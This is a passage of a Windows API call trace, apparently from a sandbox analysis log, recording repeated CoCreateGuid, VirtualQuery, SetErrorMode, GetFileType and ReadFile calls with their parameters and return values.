	[0062.161] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.161] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xa2a12b27, Data2=0xad6b, Data3=0x4568, Data4=([0]=0xa9, [1]=0x5e, [2]=0x70, [3]=0x8f, [4]=0x6e, [5]=0x34, [6]=0xdd, [7]=0xa1))) returned 0x0
	[0062.161] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x45cdb18b, Data2=0xd0f7, Data3=0x4c42, Data4=([0]=0x8b, [1]=0x4c, [2]=0xbf, [3]=0x9c, [4]=0xa5, [5]=0xcb, [6]=0x30, [7]=0xbd))) returned 0x0
	[0062.161] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x973a5c88, Data2=0x30d8, Data3=0x41cb, Data4=([0]=0xb2, [1]=0x55, [2]=0x31, [3]=0x3a, [4]=0x24, [5]=0x68, [6]=0x7, [7]=0x10))) returned 0x0
	[0062.161] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xaacede5c, Data2=0xcbfa, Data3=0x472b, Data4=([0]=0x91, [1]=0xe8, [2]=0xb6, [3]=0x1, [4]=0xd2, [5]=0x75, [6]=0xcb, [7]=0xb1))) returned 0x0
	[0062.162] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xd73968c, Data2=0xe54e, Data3=0x4f24, Data4=([0]=0xb8, [1]=0x7c, [2]=0x84, [3]=0x6e, [4]=0xe7, [5]=0xcb, [6]=0x97, [7]=0x77))) returned 0x0
	[0062.162] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x116e5c58, Data2=0xc661, Data3=0x473d, Data4=([0]=0xad, [1]=0x0, [2]=0xe, [3]=0xbc, [4]=0x9, [5]=0x1e, [6]=0x7b, [7]=0xf6))) returned 0x0
	[0062.162] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x19b337a9, Data2=0xe93c, Data3=0x4377, Data4=([0]=0xa7, [1]=0x2d, [2]=0xb, [3]=0x2b, [4]=0xe9, [5]=0x60, [6]=0x9c, [7]=0x37))) returned 0x0
	[0062.162] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x66c2ea62, Data2=0xeb54, Data3=0x473e, Data4=([0]=0x90, [1]=0xa2, [2]=0x6d, [3]=0x25, [4]=0x0, [5]=0x66, [6]=0x6e, [7]=0x62))) returned 0x0
	[0062.162] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xcc6bd8ed, Data2=0xc1fe, Data3=0x4e9f, Data4=([0]=0xb3, [1]=0xbc, [2]=0xbc, [3]=0xad, [4]=0x94, [5]=0x67, [6]=0x93, [7]=0x73))) returned 0x0
	[0062.162] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x1f19e1fa, Data2=0x3f60, Data3=0x4b85, Data4=([0]=0x9a, [1]=0x61, [2]=0x99, [3]=0xcb, [4]=0x40, [5]=0xe0, [6]=0xf7, [7]=0xeb))) returned 0x0
	[0062.163] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xa106048, Data2=0xa803, Data3=0x4589, Data4=([0]=0x92, [1]=0x48, [2]=0xd, [3]=0x8e, [4]=0x99, [5]=0xba, [6]=0x55, [7]=0x14))) returned 0x0
	[0062.163] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xdda11ac8, Data2=0x9d63, Data3=0x4ddb, Data4=([0]=0x89, [1]=0xa4, [2]=0x0, [3]=0x76, [4]=0xab, [5]=0x25, [6]=0xc0, [7]=0xe9))) returned 0x0
	[0062.163] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xa413fab, Data2=0x5af7, Data3=0x412a, Data4=([0]=0x9a, [1]=0x87, [2]=0x8c, [3]=0xd7, [4]=0xf7, [5]=0x91, [6]=0x36, [7]=0x73))) returned 0x0
	[0062.163] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x95b85e61, Data2=0xdc99, Data3=0x4e44, Data4=([0]=0xb2, [1]=0xde, [2]=0x66, [3]=0x27, [4]=0x3b, [5]=0xd8, [6]=0xe, [7]=0x2e))) returned 0x0
	[0062.163] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xce97624f, Data2=0xef27, Data3=0x411a, Data4=([0]=0x8c, [1]=0x1b, [2]=0x2c, [3]=0x30, [4]=0xf5, [5]=0x77, [6]=0x98, [7]=0xfe))) returned 0x0
	[0062.163] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x21bfb5d5, Data2=0xc3c6, Data3=0x4cff, Data4=([0]=0xa2, [1]=0x61, [2]=0x55, [3]=0xed, [4]=0xae, [5]=0xc9, [6]=0x32, [7]=0x18))) returned 0x0
	[0062.164] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x98c7dcf1, Data2=0x5998, Data3=0x4a0d, Data4=([0]=0xa9, [1]=0x24, [2]=0xad, [3]=0xe3, [4]=0xf7, [5]=0x20, [6]=0xe8, [7]=0x59))) returned 0x0
	[0062.164] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x967833c, Data2=0xf06b, Data3=0x459b, Data4=([0]=0x9a, [1]=0xfc, [2]=0x21, [3]=0x9d, [4]=0x0, [5]=0xde, [6]=0xb1, [7]=0x6c))) returned 0x0
	[0062.164] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xa189ef3, Data2=0x2bb4, Data3=0x4eaa, Data4=([0]=0x9e, [1]=0xc1, [2]=0xba, [3]=0xca, [4]=0xe8, [5]=0x81, [6]=0x98, [7]=0x20))) returned 0x0
	[0062.164] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x1f1d2638, Data2=0x6183, Data3=0x444f, Data4=([0]=0xb4, [1]=0xa1, [2]=0x32, [3]=0xea, [4]=0xa9, [5]=0xa3, [6]=0x14, [7]=0x71))) returned 0x0
	[0062.164] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x7f74f50f, Data2=0x8ff8, Data3=0x46d7, Data4=([0]=0x96, [1]=0x2c, [2]=0xde, [3]=0x86, [4]=0xb8, [5]=0xc1, [6]=0xbd, [7]=0xec))) returned 0x0
	[0062.164] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x479bc285, Data2=0x37d3, Data3=0x4a1e, Data4=([0]=0x81, [1]=0x29, [2]=0xc3, [3]=0xa3, [4]=0x40, [5]=0x2e, [6]=0x72, [7]=0x94))) returned 0x0
	[0062.165] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xb44e8485, Data2=0x246d, Data3=0x47f2, Data4=([0]=0xaf, [1]=0xd4, [2]=0xa6, [3]=0x2a, [4]=0x1d, [5]=0x7e, [6]=0x22, [7]=0x8b))) returned 0x0
	[0062.165] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xc5581e0, Data2=0x5daf, Data3=0x4179, Data4=([0]=0xa2, [1]=0xc0, [2]=0x38, [3]=0x4e, [4]=0xf1, [5]=0x41, [6]=0xf7, [7]=0xe4))) returned 0x0
	[0062.165] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x45e919f0, Data2=0xa063, Data3=0x4c55, Data4=([0]=0xa9, [1]=0x76, [2]=0xcc, [3]=0x54, [4]=0xe4, [5]=0xa7, [6]=0x1e, [7]=0x32))) returned 0x0
	[0062.165] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x16e9f635, Data2=0x8dd9, Data3=0x43d8, Data4=([0]=0xbf, [1]=0xa9, [2]=0xb0, [3]=0xc3, [4]=0xea, [5]=0xd5, [6]=0x77, [7]=0x5a))) returned 0x0
	[0062.165] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x862b69c3, Data2=0xf2c0, Data3=0x4267, Data4=([0]=0xbc, [1]=0xd0, [2]=0xe2, [3]=0x3, [4]=0x25, [5]=0x29, [6]=0x84, [7]=0x7f))) returned 0x0
	[0062.165] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x69285839, Data2=0x2257, Data3=0x4730, Data4=([0]=0x92, [1]=0xc0, [2]=0x97, [3]=0xfb, [4]=0xfd, [5]=0xf9, [6]=0xc4, [7]=0x44))) returned 0x0
	[0062.166] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x2d8e3143, Data2=0x779e, Data3=0x49cb, Data4=([0]=0xba, [1]=0xc3, [2]=0x77, [3]=0x13, [4]=0x56, [5]=0x56, [6]=0x15, [7]=0xcb))) returned 0x0
	[0062.166] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x7e4da254, Data2=0xfc51, Data3=0x4ded, Data4=([0]=0x98, [1]=0xa9, [2]=0x52, [3]=0x31, [4]=0xff, [5]=0x12, [6]=0x3b, [7]=0xe7))) returned 0x0
	[0062.166] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xa098e306, Data2=0x50a2, Data3=0x4d4b, Data4=([0]=0xb7, [1]=0x52, [2]=0x0, [3]=0xbc, [4]=0xec, [5]=0xf5, [6]=0x17, [7]=0xf4))) returned 0x0
	[0062.166] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x20d78f19, Data2=0xf2df, Data3=0x4214, Data4=([0]=0x82, [1]=0xf6, [2]=0xc0, [3]=0xfb, [4]=0xe4, [5]=0xdf, [6]=0x35, [7]=0x92))) returned 0x0
	[0062.166] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xbb5a7310, Data2=0x373, Data3=0x4c0e, Data4=([0]=0x9f, [1]=0x94, [2]=0x45, [3]=0x7, [4]=0x18, [5]=0xeb, [6]=0xeb, [7]=0xe3))) returned 0x0
	[0062.166] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x4e234bef, Data2=0x50fd, Data3=0x4226, Data4=([0]=0x91, [1]=0xf, [2]=0x4d, [3]=0xa3, [4]=0x1f, [5]=0xba, [6]=0xc1, [7]=0xd3))) returned 0x0
	[0062.167] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xcabadf22, Data2=0x8a0, Data3=0x4b80, Data4=([0]=0xb0, [1]=0x9b, [2]=0x28, [3]=0xfd, [4]=0x3e, [5]=0x14, [6]=0x4a, [7]=0x9))) returned 0x0
	[0062.167] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xed919489, Data2=0xc86f, Data3=0x4187, Data4=([0]=0x92, [1]=0x5d, [2]=0x8b, [3]=0x51, [4]=0xd1, [5]=0xce, [6]=0xa8, [7]=0x54))) returned 0x0
	[0062.167] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x554e55e, Data2=0xef23, Data3=0x4d94, Data4=([0]=0x90, [1]=0x7, [2]=0x7f, [3]=0xa6, [4]=0x84, [5]=0x6, [6]=0x71, [7]=0xd7))) returned 0x0
	[0062.167] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x955defc6, Data2=0x344, Data3=0x42e5, Data4=([0]=0x8e, [1]=0x3c, [2]=0x96, [3]=0x15, [4]=0xd1, [5]=0x6e, [6]=0x8c, [7]=0x2a))) returned 0x0
	[0062.167] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.167] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x52c83847, Data2=0xbdc4, Data3=0x4f23, Data4=([0]=0xa8, [1]=0xd9, [2]=0xca, [3]=0x17, [4]=0xa, [5]=0x9, [6]=0x9b, [7]=0x80))) returned 0x0
	[0062.168] VirtualQuery (in: lpAddress=0x278ff0, lpBuffer=0x3500279eb0, dwLength=0x30 | out: lpBuffer=0x3500279eb0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.168] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.169] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.169] GetFileType (hFile=0x690) returned 0x1
	[0062.169] ReadFile (in: hFile=0x690, lpBuffer=0x233e4a22f10, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a518, lpOverlapped=0x0 | out: lpBuffer=0x233e4a22f10*, lpNumberOfBytesRead=0x350027a518*=0x1000, lpOverlapped=0x0) returned 1
	[0062.177] VirtualQuery (in: lpAddress=0x279040, lpBuffer=0x3500279f00, dwLength=0x30 | out: lpBuffer=0x3500279f00*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.178] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xf2e2d765, Data2=0xfd66, Data3=0x4fb4, Data4=([0]=0x8d, [1]=0x76, [2]=0x1d, [3]=0xd1, [4]=0xc2, [5]=0xf1, [6]=0x62, [7]=0x94))) returned 0x0
	[0062.178] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.178] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xb7eade83, Data2=0x8107, Data3=0x41ee, Data4=([0]=0x92, [1]=0xc0, [2]=0x89, [3]=0x97, [4]=0xa4, [5]=0xee, [6]=0xa6, [7]=0x71))) returned 0x0
	[0062.178] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x4de261e5, Data2=0xa2f7, Data3=0x40a3, Data4=([0]=0x9c, [1]=0xd2, [2]=0x8e, [3]=0xd2, [4]=0xf8, [5]=0x33, [6]=0xc7, [7]=0x1))) returned 0x0
	[0062.178] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x4fe7bc8, Data2=0x4c71, Data3=0x4fe6, Data4=([0]=0xa4, [1]=0xbc, [2]=0xe8, [3]=0x22, [4]=0xff, [5]=0x9f, [6]=0xea, [7]=0x1b))) returned 0x0
	[0062.179] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.179] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.179] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x19104da3, Data2=0x44b2, Data3=0x4e22, Data4=([0]=0xb4, [1]=0x58, [2]=0xe0, [3]=0x26, [4]=0x8f, [5]=0x3f, [6]=0x99, [7]=0x21))) returned 0x0
	[0062.179] SetErrorMode (uMode=0x1) returned 0x8001
	[0062.180] SetErrorMode (uMode=0x8001) returned 0x1
	[0062.180] GetFileType (hFile=0x690) returned 0x1
	[0062.180] ReadFile (in: hFile=0x690, lpBuffer=0x233e4a667a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a518, lpOverlapped=0x0 | out: lpBuffer=0x233e4a667a8*, lpNumberOfBytesRead=0x350027a518*=0x1000, lpOverlapped=0x0) returned 1
	[0062.183] ReadFile (in: hFile=0x690, lpBuffer=0x233e4a667a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a518, lpOverlapped=0x0 | out: lpBuffer=0x233e4a667a8*, lpNumberOfBytesRead=0x350027a518*=0x1000, lpOverlapped=0x0) returned 1
	[0062.186] ReadFile (in: hFile=0x690, lpBuffer=0x233e4a667a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a518, lpOverlapped=0x0 | out: lpBuffer=0x233e4a667a8*, lpNumberOfBytesRead=0x350027a518*=0x1000, lpOverlapped=0x0) returned 1
	[0062.191] ReadFile (in: hFile=0x690, lpBuffer=0x233e4a667a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a518, lpOverlapped=0x0 | out: lpBuffer=0x233e4a667a8*, lpNumberOfBytesRead=0x350027a518*=0x1000, lpOverlapped=0x0) returned 1
	[0062.198] ReadFile (in: hFile=0x690, lpBuffer=0x233e4a667a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x350027a518, lpOverlapped=0x0 | out: lpBuffer=0x233e4a667a8*, lpNumberOfBytesRead=0x350027a518*=0x1000, lpOverlapped=0x0) returned 1
	[0062.215] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x76e7708a, Data2=0xf58c, Data3=0x4c96, Data4=([0]=0x84, [1]=0x7f, [2]=0xd8, [3]=0x11, [4]=0xa8, [5]=0x1, [6]=0x38, [7]=0x7e))) returned 0x0
	[0062.215] VirtualQuery (in: lpAddress=0x279180, lpBuffer=0x350027a040, dwLength=0x30 | out: lpBuffer=0x350027a040*(BaseAddress=0x279000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca07000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.215] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xb495451e, Data2=0xca18, Data3=0x4b2d, Data4=([0]=0x9f, [1]=0xe9, [2]=0x7e, [3]=0x51, [4]=0x48, [5]=0xa4, [6]=0x37, [7]=0xd2))) returned 0x0
	[0062.289] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0x154791a8, Data2=0x168e, Data3=0x4472, Data4=([0]=0xad, [1]=0x29, [2]=0xd8, [3]=0x1, [4]=0xcc, [5]=0x8b, [6]=0x49, [7]=0x73))) returned 0x0
	[0062.289] VirtualQuery (in: lpAddress=0x2787e0, lpBuffer=0x35002796a0, dwLength=0x30 | out: lpBuffer=0x35002796a0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.289] VirtualQuery (in: lpAddress=0x2784b0, lpBuffer=0x3500279370, dwLength=0x30 | out: lpBuffer=0x3500279370*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.290] VirtualQuery (in: lpAddress=0x2787e0, lpBuffer=0x35002796a0, dwLength=0x30 | out: lpBuffer=0x35002796a0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.290] VirtualQuery (in: lpAddress=0x278870, lpBuffer=0x3500279730, dwLength=0x30 | out: lpBuffer=0x3500279730*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.290] VirtualQuery (in: lpAddress=0x278ff0, lpBuffer=0x3500279eb0, dwLength=0x30 | out: lpBuffer=0x3500279eb0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.291] VirtualQuery (in: lpAddress=0x278ff0, lpBuffer=0x3500279eb0, dwLength=0x30 | out: lpBuffer=0x3500279eb0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.291] VirtualQuery (in: lpAddress=0x278ff0, lpBuffer=0x3500279eb0, dwLength=0x30 | out: lpBuffer=0x3500279eb0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.291] VirtualQuery (in: lpAddress=0x278aa0, lpBuffer=0x3500279960, dwLength=0x30 | out: lpBuffer=0x3500279960*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.291] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.291] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.292] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.292] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.292] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.292] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.292] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.293] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.293] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.293] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.293] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.293] VirtualQuery (in: lpAddress=0x278c20, lpBuffer=0x3500279ae0, dwLength=0x30 | out: lpBuffer=0x3500279ae0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.293] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.294] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.294] VirtualQuery (in: lpAddress=0x278f50, lpBuffer=0x3500279e10, dwLength=0x30 | out: lpBuffer=0x3500279e10*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.294] VirtualQuery (in: lpAddress=0x278fe0, lpBuffer=0x3500279ea0, dwLength=0x30 | out: lpBuffer=0x3500279ea0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.294] CoCreateGuid (in: pguid=0x350027a7d0 | out: pguid=0x350027a7d0*(Data1=0xb5efcd49, Data2=0x4a51, Data3=0x4686, Data4=([0]=0xab, [1]=0x27, [2]=0x41, [3]=0x38, [4]=0x3b, [5]=0xd3, [6]=0x58, [7]=0xaf))) returned 0x0
	[0062.295] VirtualQuery (in: lpAddress=0x2787e0, lpBuffer=0x35002796a0, dwLength=0x30 | out: lpBuffer=0x35002796a0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.295] VirtualQuery (in: lpAddress=0x2784b0, lpBuffer=0x3500279370, dwLength=0x30 | out: lpBuffer=0x3500279370*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.295] VirtualQuery (in: lpAddress=0x278f60, lpBuffer=0x3500279e20, dwLength=0x30 | out: lpBuffer=0x3500279e20*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0062.295] VirtualQuery (in: lpAddress=0x278c30, lpBuffer=0x3500279af0, dwLength=0x30 | out: lpBuffer=0x3500279af0*(BaseAddress=0x278000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x5ca08000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
